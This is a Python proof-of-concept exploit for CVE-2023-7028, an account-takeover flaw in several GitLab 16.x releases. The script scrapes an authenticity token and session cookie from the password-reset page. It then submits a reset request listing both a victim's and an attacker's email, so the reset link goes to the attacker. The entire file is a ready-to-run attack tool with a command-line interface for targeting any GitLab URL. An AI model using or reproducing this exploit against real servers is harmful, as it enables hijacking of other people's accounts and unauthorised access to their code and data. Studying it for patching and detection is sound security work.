CVE-2023-7028 PoC.py

# Author: Thanh Lam
# Description: CVE-2023-7028 - Account TakeOver Vulnerability on GitLab
# All instances of GitLab CE/EE using the following versions were vulnerable:
#     16.1 to 16.1.5
#     16.2 to 16.2.8
#     16.3 to 16.3.6
#     16.4 to 16.4.4
#     16.5 to 16.5.5
#     16.6 to 16.6.3
#     16.7 to 16.7.1

import argparse
import re
from urllib.parse import urlencode

import requests
from colorama import Style, Fore


def print_colored_message(message, color):
    print(f"{color}{message}{Style.RESET_ALL}")


def get_token(hostname):
    response = requests.get(f"{hostname}/users/password/new", verify=False)
    reg_authen = r'<input type="hidden" name="authenticity_token" value="(.*?)" autocomplete="off" />'
    reg_session = r"_gitlab_session=(.*?);"
    token = re.findall(reg_authen, response.text)[0]
    session = re.findall(reg_session, response.headers['Set-Cookie'])[0]
    thanh_lam = {'token': token, 'session': session}
    return thanh_lam


def exploit(hostname, victim_email, attacker_email):
    result_message = f"[RESULT] Emails sent to {victim_email} and {attacker_email}!\n"
    process_leak_token_message = "[PROCESS...] Leaking Token and Cookie!\n"
    process_sending_payload = "[PROCESS...] Sending Payload!\n"
    error_message = "[ERROR] Error! @@\n"

    url = f"{hostname}/users/password"
    print_colored_message(process_leak_token_message, Fore.BLUE)
    thanh_lam = get_token(hostname)
    info_message = "[INFO] Token: " + thanh_lam['token'] + "\n" + "[INFO] Cookie :" + thanh_lam["session"] + "\n"
    print_colored_message(info_message, Fore.YELLOW)
    body = urlencode({
        'authenticity_token': thanh_lam['token'],
        'user[email][]': [victim_email, attacker_email]
    }, doseq=True)

    headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
        'Content-Length': str(len(body)),
        'Connection': 'close',
        'Cookie': f'_gitlab_session={thanh_lam["session"]}'
    }

    print_colored_message(process_sending_payload, Fore.BLUE)
    send_payload = requests.post(
        url,
        headers=headers,
        data=body,
        verify=False
    ).text

    # print(send_payload)
    alert = "If your email address exists in our database, you will receive a password recovery link at your email " \
            "address in a few minutes."
    if alert in send_payload:
        print_colored_message(result_message, Fore.GREEN)
    else:
        print_colored_message(error_message, Fore.RED)


if __name__ == '__main__':
    parser = argparse.ArgumentParser(add_help=True,
                                     description='Tool exploit CVE-2023-7028 on gitlab',
                                     usage="python3 CVE-2023-7028 -u http://ip:port -v victim_email -a attacker_email"
                                     )
    parser.add_argument("-u", "--url", required=True, help="Gitlab url")
    parser.add_argument("-v", "--victim", required=True, help="victim email")
    parser.add_argument("-a", "--attacker", required=True, help="attacker email")
    args = parser.parse_args()
    url = args.url
    victim = args.victim
    attacker = args.attacker
    exploit(url, victim, attacker)